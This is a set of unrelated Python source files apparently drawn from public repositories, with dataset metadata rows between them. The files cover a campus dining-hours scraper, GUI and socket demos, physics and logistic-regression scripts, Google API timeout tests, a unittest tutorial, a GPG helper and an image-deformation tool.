containers = page_soup.findAll("table",{"class": "tablesaw tablesaw-stack"})
openPlaces = []
times = []
places = []
data = []
for container in containers:
day_values = container.tbody.findAll("tr")
place = ""
for val in day_values:
if val.th is not None: # Ex. J2 Dining
place = val.th
places.append(place.text.strip())
day_info = val.findAll("td")
days = []
isTime = 0
timeLeft = 0
timesRange = ""
dayRange = ""
for temp in day_info:
text = temp.text.strip()
if (len(text) != 0): # avoid spaces under days
if (text[0].isdigit() or text == "Closed" or text[0] == "N"): # time ranges
timesRange = text
isTime = checkTime(text, time)
else:
dayRange = text
days = checkDay(text)
if (len(days) > 0 and -1 not in days):
if (day in days and isTime == 1):
data.append({"name": place.text.strip()})
sac(time, data)
union(time, data)
print data
return render_template('index.html', data=data)
def sac(currTime, data):
sacRestaurants = ["Chick-fil-A", "P.O.D.", "Starbucks", "Taco Cabana", "Zen"]
dayIndex = datetime.today().weekday()
# dayIndex = getDayIndex(day)
dining_url = 'https://universityunions.utexas.edu/sac-hours/fall-2019'
uClient = uReq(dining_url)
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
containers = page_soup.findAll("table",{"class": "tablesaw tablesaw-stack"})
locations = containers[2].tbody.findAll("tr")
for location in locations:
times = location.findAll("td")
name = times[0].text.strip()
if (name[:6] == "P.O.D."):
name = "P.O.D."
if (name in sacRestaurants):
if (checkSacTime(times[dayIndex].text.strip(), currTime) == 1):
data.append({"name": name})
# print data
def union(currTime, data):
unionRestaurants = ["Starbucks", "Chick-Fil-A", "P.O.D.", "Quiznos", "MoZZo", "Panda Express", "Field of Greens Market Place", "Wendy's @ Jester", "Java City @ PCL"]
dayIndex = datetime.today().weekday()
# print day
# dayIndex = getDayIndex(day)
dining_url = 'https://universityunions.utexas.edu/union-hours/fall-2019'
uClient = uReq(dining_url)
page_html = uClient.read()
uClient.close()
page_soup = soup(page_html, "html.parser")
containers = page_soup.findAll("table",{"class": "tablesaw tablesaw-stack"})
locations = containers[0].tbody.findAll("tr")
# print dayIndex
for location in locations:
times = location.findAll("td")
name = times[0].text.strip()
if (name[:3] == "Prov"):
name = "P.O.D."
if (name in unionRestaurants):
# print name
if (checkUnionTime(times[dayIndex].text.strip(), currTime) == 0):
data.append({"name": name})
def checkUnionTime(text, currTime):
if (text == "Closed"):
return 0
split = text.split(" ")
startTime = split[0]
endTime = split[2]
start = -1
if (startTime[1] == "0"):
start = 10
elif (startTime[1] == "1"):
start = 11
elif (startTime[0] == "N"):
start = 12
else:
if (startTime[-2] == "a"):
start = int(startTime[0])
else:
start = int(startTime[0]) + 12
end = -1
if (endTime[1] == "0"):
end = 22
elif (endTime[1] == "1"):
end = 23
else:
if (endTime[-2] == "a"):
end = int(endTime[0])
else:
end = int(endTime[0]) + 12
if (int(currTime) > int(start) and int(currTime) < int(end)):
return 1
return 0
def checkSacTime(text, currTime):
if (text == "Closed"):
return 0
split = text.split(" ")
startTime = split[0]
endTime = split[2]
start = 10 if startTime[1] != ":" else int(startTime[0]) if startTime[-2] == "a" else int(startTime[0]) + 12
end = int(endTime[0]) if endTime[-2] == "a" else int(endTime[0]) + 12 if endTime[1] == ":" else int(endTime[:2]) + 12
if (currTime > start and currTime < end):
return 1
return 0
# Compares current time to open times and returns 0
# if closed, 1 if open
def checkTime(text, currTime):
if (text == "Closed"):
return 0
split = text.split(" ")
begin = split[0]
if (begin == "Noon"):
begin = 12
if (split[1] == "p.m."): # convert to 24 hour time
begin = int(begin) + 12
end = split[-2] if split[-1] != "p.m." else int(split[-2]) + 12
if (int(currTime) < int(end) and int(currTime) >= int(begin)):
return 1
return 0
# Takes range of dates and returns array holding indices of
# the days
def checkDay(text):
days = []
split = text.split(" ")
if len(split) == 1:
days.append(getDayIndex(split[0]))
elif ("-" in split):
start = getDayIndex(split[0])
end = getDayIndex(split[2])
for i in range(start, end + 1):
days.append(i)
elif ("and" in split or "&" in split):
days.append(getDayIndex(split[0]))
days.append(getDayIndex(split[2]))
return days
# Changes day to index
def getDayIndex(text):
if text == "Monday":
return 0
if text == "Tuesday":
return 1
if text == "Wednesday":
return 2
if text == "Thursday":
return 3
if text == "Friday":
return 4
if text == "Saturday":
return 5
if text == "Sunday":
return 6
return -1
time = str(datetime.now().time().hour)
# union(time, [])
# sac(time, [])
# main()
if __name__ == '__main__':
app.run(debug=True) | true |
8ea00784102a8d3db6cc189f2d0c805ebbcce92c | Python | kingdelee/LeePy | /PyQT5/MyPyqtTest/singal/up/t4.py | UTF-8 | 1,329 | 3.21875 | 3 | [] | no_license | import sys
from PyQt5.QtWidgets import *
from functools import partial
class WinForm(QMainWindow):
def __init__(self, parent=None):
super(WinForm, self).__init__(parent)
# 实例化两个按钮
button1 = QPushButton('Button1')
button2 = QPushButton('Button2')
# todo 第一种方法
# 单击信号关联槽函数,利用Lanbda表达式传递一个参数
# button1.clicked.connect(lambda :self.onButtonClick(1))
# button2.clicked.connect(lambda :self.onButtonClick(2))
#
# todo 第二种方法
button1.clicked.connect(partial(self.onButtonClick, 1))
button2.clicked.connect(partial(self.onButtonClick, 2))
# 实例化窗口
main = QWidget()
# 设置窗口的布局,并向其中添加控件
layout = QHBoxLayout(main)
layout.addWidget(button1)
layout.addWidget(button2)
# 设置为中央控件
self.setCentralWidget(main)
def onButtonClick(self, n):
# 弹窗信息提示框,输出被点击的信息
print("Button {0}".format(n))
QMessageBox.information(self, '信息提示框', 'Button {0}'.format(n))
if __name__ == '__main__':
app = QApplication(sys.argv)
form = WinForm()
form.show()
sys.exit(app.exec_())
| true |
704762ea8c4e69dc812925ec1ffbe38e850adb7b | Python | EdgarHE/Iot-Design | /PiChat.py | UTF-8 | 2,127 | 3.046875 | 3 | [] | no_license | #!python2
import thread
import time
import SocketServer
import socket
import sys
class MyTCPHandler(SocketServer.BaseRequestHandler):
"""
The request handler class for our server.
It is instantiated once per connection to the server, and must
override the handle() method to implement communication to the
client.
"""
def handle(self):
# self.request is the TCP socket connected to the client
A = {}
A['temp'] = 0
A['lum']=0
self.data = self.request.recv(1024).strip()
tmp = self.data
length = len(tmp.split(';'))-1
for i in range(0, length):
if tmp.split(';')[i].split(':')[0] == 'temp':
A['temp'] = int(tmp.split(';')[i].split(':')[1])
if tmp.split(';')[i].split(':')[0] == 'lum':
A['lum'] = int(tmp.split(';')[i].split(':')[1])
print 'temp: %d' %A['temp']
print 'lum: %d' %A['lum']
#print 'length: %d'%length
#print tmp
#print '{} :{}'.format(self.client_address[0], self.data)
# Define the server function for the thread
def server_thread(HOST, PORT):
server = SocketServer.TCPServer((HOST, PORT), MyTCPHandler)
print "The server start at port %s" % ( PORT )
server.serve_forever()
# Define the client function for the thread
def client_thread( HOST, PORT):
# Create a socket (SOCK_STREAM means a TCP socket)
print 'Ready to connect to %s' % (HOST)
print ''
raw_input("Press enter to begin connection")
while True:
data = user_input = raw_input()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# Connect to server and send data
sock.connect((HOST, PORT))
sock.sendall(data + "\n")
# Receive data from the server and shut down
#received = sock.recv(1024)
finally:
sock.close()
#MAIN
HOST = ''
PORT = 8888
if len(sys.argv) != 2:
print "Usage: python PiChat <Destination IP"
exit(0)
try:
thread.start_new_thread( server_thread, (HOST, PORT, ) )
thread.start_new_thread( client_thread, (sys.argv[1], PORT, ) )
except:
print "Error: unable to start thread"
while 1:
pass
| true |
1829321bf3757b19cdc896b38b7fcdfae0301d3c | Python | jiax1994/Physics-simulations | /lab3/fig.py | UTF-8 | 2,098 | 4.125 | 4 | [] | no_license | '''ceci est un programme qui calcule et affiche les positions de y en fonction de x selon les différents angles, il y a deux graphiques
'''
#importation de module numpy et la librairie matplotlib
import numpy as np
import matplotlib.pyplot as plt
#définir la fonction de la trajectoire de projectile
def trajectoire(v0,theta,pas):
#définir la constante g et le temps final Tf
g=9.8
Tf=2*v0*np.sin(np.deg2rad(theta))/g
#définir la différence de temps entre chaque position
dt=Tf/pas
#définir les formules et les variables
t=np.arange(0,Tf,dt)
x=v0*t*np.cos(np.deg2rad(theta))
y=v0*t*np.sin(np.deg2rad(theta))-g*t**2/2
#retourner les valeurs
return x,y,t,Tf
#définir une fonction croissante
def monotone_croissant(d):
#définir le rayon de i
for i in range(len(d)-1):
#définir une condition vraie
true=d[i]<d[i+1]
#si la condition est vraie, sauter le reste de l'itération
if true:
continue
#sinon, afficher la valeur de d[i+1] et arrêter l'itération
else:
print('la courbe est décroissant à ',d[i+1],'pour un angle de ',theta)
break
#retourne le résultat
return true
#liste des différents angles
thetatab=[30,35,40,45,50,55,60,65,70,75,80]
#création de deux graphiques dans un figure
plt.figure(1,figsize=(8.,4.),dpi=100)
#tracer les courbes pour chaques itérations
for theta in thetatab:
#calculer f et convertir f en tableau
f=trajectoire(15,theta,500)
f=np.asarray(f)
#tracer la première graphique
plt.subplot(1,2,1)
plt.plot(f[0],f[1] ,'b')
plt.xlabel('x')
plt.ylabel('y')
#définir la distance d
d=((f[0]**2)+(f[1]**2))**0.5
#tester si d est croissant
r=monotone_croissant(d)
#normaliser le temps
t=f[2]/f[3]
#tracer la deuxième graphique
plt.subplot(1,2,2)
plt.plot (t,d,'g',label=theta)
plt.xlabel('t/Tf')
plt.ylabel('d')
plt.show()
| true |
052e63527e59231b4bc36c311a11c0e6ce8bc5c5 | Python | mfmakahiya/empath-on-movie-reviews | /python scripts/empath on movie reviews.py | UTF-8 | 2,757 | 2.890625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
###############################################################################
# This script applies empath on movie reviews
###############################################################################
# Load libraries
import os
import logging
from empath import Empath
import pandas as pd
# Set up folder locations
source_folder_path_list = []
source_folder_path = "C:/Users/Marriane/Documents/GitHub/empath-on-movie-reviews/data/input/scale_whole_review.tar (with text)/scale_whole_review/scale_whole_review/"
folder_list = ["Dennis+Schwartz/txt.parag"] #, "James+Berardinelli/txt.parag", "Scott+Renshaw/txt.parag", "Steve+Rhodes/txt.parag"]
for folder in folder_list:
folder_loc = source_folder_path + folder
source_folder_path_list.append(folder_loc)
print(source_folder_path_list)
###############################################################################
## Program Logic
###############################################################################
if __name__ == "__main__":
lexicon = Empath()
result = lexicon.analyze("the quick brown fox jumps over the lazy dog", normalize=True)
df0 = pd.Series(result, name = 'KeyValue')
col_names = df0.keys()
df = pd.DataFrame(columns=col_names)
for folder in source_folder_path_list:
txt_list = []
for file in os.listdir(folder):
if file.endswith(".txt"):
txt_list.append(file)
for txt_i in txt_list:
txt_file_name = txt_i
logging.getLogger().setLevel(logging.INFO)
logging.info("Converting " + txt_i)
txt_full_path = os.path.join(folder, txt_file_name)
try:
txt_file = open(txt_full_path, 'r')
lines = txt_file.readlines()
lexicon = Empath()
result = lexicon.analyze(lines, normalize=True)
new_result = pd.Series(result, name = txt_full_path)
new_result.index.name = 'Key'
new_result.reset_index()
df = df.append(new_result)
logging.info(txt_i, " successfully analyzed")
except:
logging.info(txt_i + " open failed")
df = df.dropna()
# Clean the data frame
df['Details'] = df.index
df['Reviewer'] = df['Details'].str.split("/").str[11]
df['Text file'] = df['Details'].str.split("/").str[12]
df = df.set_index(['Reviewer', 'Text file'])
df = df.drop(['Details'], axis = 1)
df.to_csv('./data/output/Empath-on-movie-reviews_results.csv', sep=',', encoding='utf-8')
| true |
12f9ed119a12ec6503a1fd579cb5d8469e4ed616 | Python | 10bddoolittle/LEDGrid | /Display_Module.py | UTF-8 | 1,855 | 3.34375 | 3 | [] | no_license | import time
from Display.GPIOModule import GPIOModule
from Display.LEDArray import LEDArray
class Display:
#active_cols = []
def __init__(self,rowgpios,colgpios):
self.numrows = len(rowgpios)
self.numcols = len(colgpios)
self.led_array = LEDArray(self.numrows, self.numcols)
self.gpio_module = GPIOModule(rowgpios,colgpios)
def outputPattern(self):
# turn off current row
self.gpio_module.deactivateRow()
# shifting the circular queues
self.gpio_module.rowgpios.shift()
self.led_array.rowindices.shift()
# getting the new set of active columns
active_cols = self.led_array.getActiveColumns(self.led_array.getRowIndex())
# Outputting Values to the LED Grid Hardware
self.gpio_module.outputColumns(active_cols)
# Activate the new row
self.gpio_module.activateRow()
'''
run time - time displays
update time - flickering time
'''
def run(self, array, run_time, update_time):
dt = 0
self.led_array.updateArray(array)
timestart = time.time()
while dt < run_time:
self.outputPattern()
time.sleep(update_time)
dt = time.time()-timestart
if __name__ == "__main__":
rowgpios = ["P8_10","P8_12"]
colgpios = ["P8_14","P8_16"]
display = Display(rowgpios,colgpios)
while True:
array_1 = [[1, 0],
[0, 0]]
array_2 = [[0, 1],
[0, 0]]
array_3 = [[0, 0],
[1, 0]]
array_4 = [[0, 0],
[0, 1]]
display.run(array_1, 2, .01 )
display.run(array_2, 2 ,.01)
display.run(array_3, 2 ,.01)
display.run(array_4, 2 ,.01)
# while True:
# time.sleep(.01)
# display.run()
| true |
47c12e07691391859faf0e25297030cf40fb1908 | Python | JeffDing/Python_Music | /utils/Decorator.py | UTF-8 | 528 | 2.84375 | 3 | [] | no_license | from functools import wraps
import re
import time
def Count(func, *args, **kwargs):
"""
统计音乐播放信息
:param f:
:param args:
:param kwargs:
:return:
"""
@wraps(func)
def wrapper(path, *args, **kwargs):
with open("log.txt", "a") as f:
# 写入当前时间及播放音乐名称
f.write(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())+"\t"+re.split(r"\\",path)[-1]+"\n")
func(path,*args, **kwargs)
return wrapper | true |
1f2b1c8cd974c8713d0c223c2fc173c8da062a0b | Python | Fangziqiang/AppiumTesting | /src/unitTest使用方法.py | UTF-8 | 5,094 | 3.484375 | 3 | [] | no_license | #unittest培训后总结记录
今天在给同学们上了自动化测试单元框架unittest之后,突发奇想,要总结下自己今天上的课程内容。于是有了下面的一幕:
首先,今天上课的目标是要学会关于unittest框架的基本使用及断言、批量执行。
第一个,unittest是什么:
为了让单元测试代码能够被测试和维护人员更容易地理解,最好的解决办法是让开发人员遵循一定的规范来编写用于测试的代码,
所以说unittest就随机缘而生,又因为用的人多了,所以逐渐的变成了python的单元测试标准。unittest单元测试框架不仅可以适
用于单元测试,还可以适用WEB自动化测试用例的开发与执行,该测试框架可组织执行测试用例,并且提供了丰富的断言方法,判断测试
用例是否通过,最终生成测试结果。
第二个,unittest类和方法的简介:
(注:所有的测试用例需要使用test开头作为用例名称)
unittest.TestCase:所有测试用例类必须继承TestCase类。
TestCase.setUp():setUp()方法用于测试用例执行前的初始化工作。例如可以初始化driver对象,可以新建数据库访问对象,可以存放公共变量等。
TestCase.tearDown():tearDown()方法用于测试用例执行之后的善后工作。如关闭浏览器,关闭数据库连接等。
TestCase.assert*():assert是一些断言方法:在执行测试用例的过程中,最终用例是否执行通过,是通过判断测试得到的实际结果和预期结果是否相
等决定的。(常用的断言有:assertEqual,assertIs,assertIn等)
unittest.skip():装饰器,当运行用例时,有些用例可能不想执行等,可用装饰器暂时屏蔽该条测试用例。
unittest.main():main()方法使用TestLoader类来搜索所有包含在该模块中以“test”命名开头的测试方法,并自动执行他们。执行方法的默认顺序
是:根据ASCII码的顺序加载测试用例,数字与字母的顺序为:0-9,A-Z,a-z。所以以A开头的测试用例方法会优先执行,以a开头会后执行。
unittest.TestSuite():TestSuite()类是用来创建测试集的。
unittest.TestSuite().addTest():addTest()方法是将测试用例添加到测试集合中。
unittest.defaultTestLoader().discover():通过defaultTestLoader类的discover()方法可自动更具测试目录start_dir匹配查找测试用例
文件(test*.py),并将查找到的测试用例组装到测试套件,因此可以直接通过run()方法执行discover。
unittest.TextTextRunner():通过该类下面的run()方法来运行suite所组装的测试用例,入参为suite测试套件。
第三,进行代码unittest实践:
具体实现代码如下:
新建Test_baidu测试类:
import unittest
from selenium import webdriver
class testBaidu1(unittest.TestCase):
# 添加setup进行初始化工作
def setUp(self):
self.driver = webdriver.Firefox()
# 测试用例使用test开头
def testbaidu(self):
self.driver.get("http://www.baidu.com")
self.driver.find_element_by_id("kw").send_keys("selenium")
self.driver.find_element_by_id("su").click()
text = self.driver.find_element_by_xpath(".//*[@id='1']/h3/a").get_attribute("text")
print(text)
# 断言判断文本是否存在于页面中
self.assertIn("Web Browser Automation",text)
def testbaidu1(self):
self.driver.get("http://www.baidu.com")
self.driver.find_element_by_id("kw").send_keys("selenium")
self.driver.find_element_by_id("su").click()
text = self.driver.find_element_by_xpath(".//*[@id='1']/h3/a").get_attribute("text")
# 断言判断文本是否存在于页面中
self.assertIn("Web Browser Automation",text)
# 添加teardown进行善后处理
def tearDown(self):
self.driver.quit()
# 添加测试集合
suit = unittest.TestSuite()
suit.addTest(testBaidu1("testbaidu"))
suit.addTest(testBaidu1("testbaidu1"))
if __name__ == '__main__':
# 使用main()方法进行运行用例
# unittest.main()
# 使用 run放进行运行测试用例集
run = unittest.TextTestRunner()
run.run(suit)
新建 run_all_case类:
import os
import unittest
# 添加用例搜索目录
case_path = os.path.join(os.getcwd(),"case")
def all_case():
# 使用discover进行自动搜索测试集
discover = unittest.defaultTestLoader.discover(case_path,
pattern="Test*.py",
top_level_dir=None
)
print(discover)
return discover
if __name__ == '__main__':
# 使用run方法运行测试集
run = unittest.TextTestRunner()
run.run(all_case())
| true |
68be00ab15037580f7965d61ee75aaea25b03e7c | Python | saw1998/ML-from-scratch | /decision_tree/17CH10065_ML_A2/Task2/Task2_A.py | UTF-8 | 1,700 | 3.1875 | 3 | [] | no_license | #!/usr/bin/env python
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
df=pd.read_csv("../dataset/dataset_A.csv")
#initialization and data manupulation
thetas=np.random.randn(12)
y=df['quality']
del df['quality']
df.insert(0,'fixed',np.ones(y.size))
############### main algorithm ####################
iteration=200
alpha=0.1
m=y.size
one=np.ones(m)
J_theta=np.ones(iteration)
print("Training....")
completed=0
for itr in range(iteration):
h_theta=np.ones(y.size)
difference=np.ones(y.size) #difference = h_theta(i) minus y(i)
for i in range(m): # m training example
theta_transpose_x=np.dot(thetas,df.loc[i])
h_theta[i]=1/(1+np.exp(-1*theta_transpose_x))
difference=h_theta - y
J_theta[itr]=(-1/m)*( np.dot(y,np.log(h_theta)) + np.dot((1-y),np.log(1-h_theta)) ) # J_theta at each iteration
for j in range(thetas.size): #training
summation = np.dot(difference,one*df.iloc[:,j])
thetas[j]=thetas[j]-(alpha/m)*summation
############## plotting ###############
plt.figure()
plt.plot(range(iteration),J_theta)
plt.xlabel('iteration')
plt.ylabel('Cost')
plt.title('Cost v/s iteration')
plt.show()
############## Accuracy ###################
acc=0
for i in range(m):
h=1/(1+np.exp(-1*np.dot(thetas,df.loc[i])))
if(h > 0.5 and y[i]==1):
acc=acc+1
elif(h <= 0.5 and y[i]==0):
acc=acc+1
acc=(acc/m)*100
print()
print(acc,'percent data on training-data are correctly classified')
| true |
44acf1540ff3b01a76d3c45654ab0e01b0cd0221 | Python | rossor/data-import | /src/gpg.py | UTF-8 | 673 | 2.5625 | 3 | [] | no_license | # -*- coding: utf-8 -*-
from subprocess import call
import logging
import os.path
def decrypt(gpgbin, source, destination):
"Return error string upon failure; or None"
if not os.path.isfile(gpgbin):
logging.critical("{} not found".format(gpgbin))
raise IOError("{} not found".format(gpgbin))
ppfile = os.path.join(os.path.expanduser("~"), ".passphrase")
if not os.path.isfile(ppfile):
return 'GPG passphrase file "{}" not found'.format(ppfile)
cmd = "{} -dq --batch --passphrase-fd 0 --output {} {} < {} 2>/dev/null".format(gpgbin, destination, source, ppfile)
logging.debug("Executing decrypt command: {}".format(cmd))
call(cmd, shell=True)
return None
| true |
4f5b582eda0d414d5bdc5ae85c0fcbeff0b4612a | Python | googleapis/python-api-core | /tests/unit/test_timeout.py | UTF-8 | 7,046 | 2.5625 | 3 | [
"Apache-2.0"
] | permissive | # Copyright 2017 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import itertools
import mock
from google.api_core import timeout as timeouts
def test__exponential_timeout_generator_base_2():
gen = timeouts._exponential_timeout_generator(1.0, 60.0, 2.0, deadline=None)
result = list(itertools.islice(gen, 8))
assert result == [1, 2, 4, 8, 16, 32, 60, 60]
@mock.patch("google.api_core.datetime_helpers.utcnow", autospec=True)
def test__exponential_timeout_generator_base_deadline(utcnow):
# Make each successive call to utcnow() advance one second.
utcnow.side_effect = [
datetime.datetime.min + datetime.timedelta(seconds=n) for n in range(15)
]
gen = timeouts._exponential_timeout_generator(1.0, 60.0, 2.0, deadline=30.0)
result = list(itertools.islice(gen, 14))
# Should grow until the cumulative time is > 30s, then start decreasing as
# the cumulative time approaches 60s.
assert result == [1, 2, 4, 8, 16, 24, 23, 22, 21, 20, 19, 18, 17, 16]
class TestTimeToDeadlineTimeout(object):
def test_constructor(self):
timeout_ = timeouts.TimeToDeadlineTimeout()
assert timeout_._timeout is None
def test_constructor_args(self):
timeout_ = timeouts.TimeToDeadlineTimeout(42.0)
assert timeout_._timeout == 42.0
def test___str__(self):
timeout_ = timeouts.TimeToDeadlineTimeout(1)
assert str(timeout_) == "<TimeToDeadlineTimeout timeout=1.0>"
def test_apply(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
datetime.datetime.utcnow()
datetime.timedelta(seconds=1)
now = datetime.datetime.utcnow()
times = [
now,
now + datetime.timedelta(seconds=0.0009),
now + datetime.timedelta(seconds=1),
now + datetime.timedelta(seconds=39),
now + datetime.timedelta(seconds=42),
now + datetime.timedelta(seconds=43),
]
def _clock():
return times.pop(0)
timeout_ = timeouts.TimeToDeadlineTimeout(42.0, _clock)
wrapped = timeout_(target)
wrapped()
target.assert_called_with(timeout=42.0)
wrapped()
target.assert_called_with(timeout=41.0)
wrapped()
target.assert_called_with(timeout=3.0)
wrapped()
target.assert_called_with(timeout=0.0)
wrapped()
target.assert_called_with(timeout=0.0)
def test_apply_no_timeout(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
datetime.datetime.utcnow()
datetime.timedelta(seconds=1)
now = datetime.datetime.utcnow()
times = [
now,
now + datetime.timedelta(seconds=0.0009),
now + datetime.timedelta(seconds=1),
now + datetime.timedelta(seconds=2),
]
def _clock():
return times.pop(0)
timeout_ = timeouts.TimeToDeadlineTimeout(clock=_clock)
wrapped = timeout_(target)
wrapped()
target.assert_called_with()
wrapped()
target.assert_called_with()
def test_apply_passthrough(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
timeout_ = timeouts.TimeToDeadlineTimeout(42.0)
wrapped = timeout_(target)
wrapped(1, 2, meep="moop")
target.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
class TestConstantTimeout(object):
def test_constructor(self):
timeout_ = timeouts.ConstantTimeout()
assert timeout_._timeout is None
def test_constructor_args(self):
timeout_ = timeouts.ConstantTimeout(42.0)
assert timeout_._timeout == 42.0
def test___str__(self):
timeout_ = timeouts.ConstantTimeout(1)
assert str(timeout_) == "<ConstantTimeout timeout=1.0>"
def test_apply(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
timeout_ = timeouts.ConstantTimeout(42.0)
wrapped = timeout_(target)
wrapped()
target.assert_called_once_with(timeout=42.0)
def test_apply_passthrough(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
timeout_ = timeouts.ConstantTimeout(42.0)
wrapped = timeout_(target)
wrapped(1, 2, meep="moop")
target.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
class TestExponentialTimeout(object):
def test_constructor(self):
timeout_ = timeouts.ExponentialTimeout()
assert timeout_._initial == timeouts._DEFAULT_INITIAL_TIMEOUT
assert timeout_._maximum == timeouts._DEFAULT_MAXIMUM_TIMEOUT
assert timeout_._multiplier == timeouts._DEFAULT_TIMEOUT_MULTIPLIER
assert timeout_._deadline == timeouts._DEFAULT_DEADLINE
def test_constructor_args(self):
timeout_ = timeouts.ExponentialTimeout(1, 2, 3, 4)
assert timeout_._initial == 1
assert timeout_._maximum == 2
assert timeout_._multiplier == 3
assert timeout_._deadline == 4
def test_with_timeout(self):
original_timeout = timeouts.ExponentialTimeout()
timeout_ = original_timeout.with_deadline(42)
assert original_timeout is not timeout_
assert timeout_._initial == timeouts._DEFAULT_INITIAL_TIMEOUT
assert timeout_._maximum == timeouts._DEFAULT_MAXIMUM_TIMEOUT
assert timeout_._multiplier == timeouts._DEFAULT_TIMEOUT_MULTIPLIER
assert timeout_._deadline == 42
def test___str__(self):
timeout_ = timeouts.ExponentialTimeout(1, 2, 3, 4)
assert str(timeout_) == (
"<ExponentialTimeout initial=1.0, maximum=2.0, multiplier=3.0, "
"deadline=4.0>"
)
def test_apply(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
timeout_ = timeouts.ExponentialTimeout(1, 10, 2)
wrapped = timeout_(target)
wrapped()
target.assert_called_with(timeout=1)
wrapped()
target.assert_called_with(timeout=2)
wrapped()
target.assert_called_with(timeout=4)
def test_apply_passthrough(self):
target = mock.Mock(spec=["__call__", "__name__"], __name__="target")
timeout_ = timeouts.ExponentialTimeout(42.0, 100, 2)
wrapped = timeout_(target)
wrapped(1, 2, meep="moop")
target.assert_called_once_with(1, 2, meep="moop", timeout=42.0)
| true |
7d82076b3ab664ea5c8d8f64c74df9b68c48cca9 | Python | ComradeMudkipz/lwp3 | /Chapter 2/compoundInterestCalculator.py | UTF-8 | 176 | 3.546875 | 4 | [] | no_license | # compoundInterestCalculator.py
# A compound interest calculator.
P = int(10000)
n = int(12)
r = float(0.8)
t = int(input("How many years? "))
print(P * (1 + r / n) ** n * t)
| true |
861ceeec149805b6026005543f4be5f2868720f6 | Python | gabriellaec/desoft-analise-exercicios | /backup/user_209/ch8_2020_08_14_13_04_52_381177.py | UTF-8 | 59 | 2.53125 | 3 | [] | no_license | def calcula_posicao (so,v,t):
p = so + v*t
return p | true |
528cc3932d89e6d8473da72e1bbaf5af25dc531b | Python | beelzebielsk/image-deformation | /draw.py | UTF-8 | 5,904 | 2.828125 | 3 | [
"MIT"
] | permissive | import tkinter
from tkinter import ttk
from PIL import ImageTk, Image
import numpy as np
import os
from deformation import deform
# Listener callbacks
def listenClick(event):
global w, current, new, deformButton
print('Clicking', event.x, event.y)
for pt in new:
point = w.coords(pt)
if (event.x >= point[0] and event.x <= point[2]) and (event.y >= point[1] and event.y <= point[3]):
print('Exists', w.type(pt))
current = pt
return
print('Creating point')
createPoint(event)
if len(new) >0:
deformButton.config(state='normal', text='Deform')
def listenDrag(event):
global w, current, new, original, arrows
print('Dragging', event.x, event.y)
print(current != None)
if current != None:
print('Dragging it!', event.x, event.y)
movePoint(event)
for pt in range(len(new)):
if current == new[pt]:
new_coords = getActualCoords(new[pt])
orig_coords = getActualCoords(original[pt])
old_coords = w.coords(arrows[pt])
w.coords(arrows[pt], old_coords[0], old_coords[1], new_coords[0], new_coords[1])
def listenRelease(event):
global current, img2
print('Releasing', event.x, event.y)
current = None
# Deform picture
# img2 = arrayToPicture(deformation.deform(getPicture(rimg1), original, new))
# w.create_image(width,0, image=img2, anchor="nw")
def listenHover(event):
updateMouseCoord(event)
def deformPicture():
global rimg1, img2, img2_canvas
p, q = getPoints()
print("List of points p:", p)
print("List of points q:", q)
image = getPicture(rimg1)
real_p = np.array(p).astype(np.int)
real_q = np.array(q).astype(np.int)
deformed = deform(image, p, q)
img2 = ImageTk.PhotoImage(arrayToPicture(deformed))
w.itemconfigure(img2_canvas, image=img2)
# Create points
def createPoint(event):
global w, width, height, new, coord
if event.x < 0 or event.x > width or event.y < 0 or event.y > height:
w.itemconfigure(coord, text=w.itemcget(coord, 'text')+' Out of bounds')
return
x = event.x
y = event.y
original.append(w.create_oval(x-9, y-9, x+9, y+9, width=0, fill="#ff0000",activefill="#ff0000",disabledfill="#ff0000"))
new.append(w.create_oval(x-9, y-9, x+9, y+9, width=0, fill="#00ff00"))
arrow = w.create_line(x, y, x, y, width=2, arrow=tkinter.LAST)
arrows.append(arrow)
# Move point
def movePoint(event):
global width, height
if event.x < 0:
x = 0
elif event.x > width:
x = width
else:
x = event.x
if event.y < 0:
y = 0
elif event.y > height:
y = height
else:
y = event.y
error_msg = ' Out of bounds' if x != event.x or y != event.y else ''
w.coords(current, x-9, y-9, x+9, y+9)
w.itemconfigure(coord, text='%d, %d'%(event.x, event.y) + error_msg)
# Get points
def getPoints():
global original, new
return list(map(getActualCoords, original)), list(map(getActualCoords, new))
# Get picture
def getPicture(pic):
return np.asarray(pic)
def arrayToPicture(arr):
return Image.fromarray(np.uint8(arr))
def getActualCoords(point):
coords = w.coords(point)
return coords[0]+9, coords[1]+9
def updateMouseCoord(event):
global w, coord
w.itemconfigure(coord, text='%d, %d'%(event.x, event.y))
def main():
global w, width, height, new, original, arrows, coord, rimg1, img2, img2_canvas, deformButton
# Initialize window and canvas
top = tkinter.Tk()
w = tkinter.Canvas(top)
w.grid(row=0, column=0)
# Event Listeners
w.bind('<Button-1>', listenClick)
w.bind('<B1-Motion>', listenDrag)
w.bind('<ButtonRelease-1>', listenRelease)
w.bind('<Motion>', listenHover)
# Open Image
rimg1 = Image.open("./dorabenny.jpg")
[width, height] = rimg1.size
# Set window to twice width to fit two pictures
w.config(width=width*2, height=height)
img1 = ImageTk.PhotoImage(rimg1)
# Figure out transformation matrix/calculations here
# a = 1
# b = 0.5
# c = 1
# d = 0
# e = 0.5
# f = 0
# rimg2 = rimg1.transform((width, height), Image.AFFINE, (a,b,c,d,e,f), Image.BICUBIC)
# img2 = ImageTk.PhotoImage(rimg2)
#rimg2 = None
# Create images
w.create_image(0, 0, image=img1, anchor="nw")
w.create_line(width, 0, width, height)
img2 = None
